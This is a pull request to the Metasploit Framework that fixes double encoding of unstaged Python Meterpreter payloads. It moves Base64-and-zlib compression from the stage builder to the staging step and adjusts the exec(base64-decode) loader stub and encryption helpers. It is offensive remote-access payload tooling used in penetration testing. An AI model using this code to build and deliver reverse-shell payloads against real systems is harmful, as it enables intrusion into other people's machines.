### PR TITLE
Fix double encoding for unstaged Python meterpreter

### DIFF
--- a/lib/msf/core/payload/python.rb
+++ b/lib/msf/core/payload/python.rb
@@ -15,7 +15,7 @@ module Msf::Payload::Python
   def py_create_exec_stub(cmd)
     # Base64 encoding is required in order to handle Python's formatting
 
-    b64_stub = "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('#{ Rex::Text.encode_base64(cmd)}')[0]))"
+    b64_stub = "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('#{Rex::Text.encode_base64(cmd)}')[0]))"
     b64_stub
 
   end

--- a/lib/msf/core/payload/python/meterpreter_loader.rb
+++ b/lib/msf/core/payload/python/meterpreter_loader.rb
@@ -47,7 +47,7 @@ module Payload::Python::MeterpreterLoader
   end
 
   def stage_payload(opts={})
-    stage_meterpreter(opts)
+    Rex::Text.encode_base64(Rex::Text.zlib_deflate(stage_meterpreter(opts)))
   end
 
   # Get the raw Python Meterpreter stage and patch in values based on the
@@ -141,7 +141,7 @@ module Payload::Python::MeterpreterLoader
       met.sub!("#{offset_string}# PATCH-SETUP-STAGELESS-TCP-SOCKET #", socket_setup)
     end
 
-    Rex::Text.encode_base64(Rex::Text.zlib_deflate(met))
+    met
   end
 
   def python_encryptor_loader
@@ -157,11 +157,11 @@ sys.modules['met_aes'] = met_aes
 sys.modules['met_rsa'] = met_rsa
 import met_rsa, met_aes
 def met_rsa_encrypt(der, msg):
-  return met_rsa.rsa_enc(der, msg)
+    return met_rsa.rsa_enc(der, msg)
 def met_aes_encrypt(key, iv, pt):
-	return met_aes.AESCBC(key).encrypt(iv, pt)
+    return met_aes.AESCBC(key).encrypt(iv, pt)
 def met_aes_decrypt(key, iv, pt):
-	return met_aes.AESCBC(key).decrypt(iv, pt)
+    return met_aes.AESCBC(key).decrypt(iv, pt)
     ?
   end
 


### PR DESCRIPTION
Hey sorry I missed this on my first testing pass! There is an issue with the unstaged payloads, basically they're being double encoded due to `stage_meterpreter` being updated to return a Base64+Deflate instead of raw Python code. This is great when it's going to the stagers which you updated to process that correctly but the unstaged verisons pass that output directly into `py_create_exec_stub` which expects to receive raw Python code. To address this and keep the compression, I moved the `Base64+Deflate` operation to `stage_payload`. This does mean the unstaged versions are not compressed, but size doesn't matter for the unstaged ones right?

This fixes the unstaged Python Meterpreter payloads.

Testing:
- [ ] Staged still works: `payload/python/meterpreter/reverse_tcp`
- [ ] Unstaged is fixed: `payload/python/meterpreter_reverse_tcp`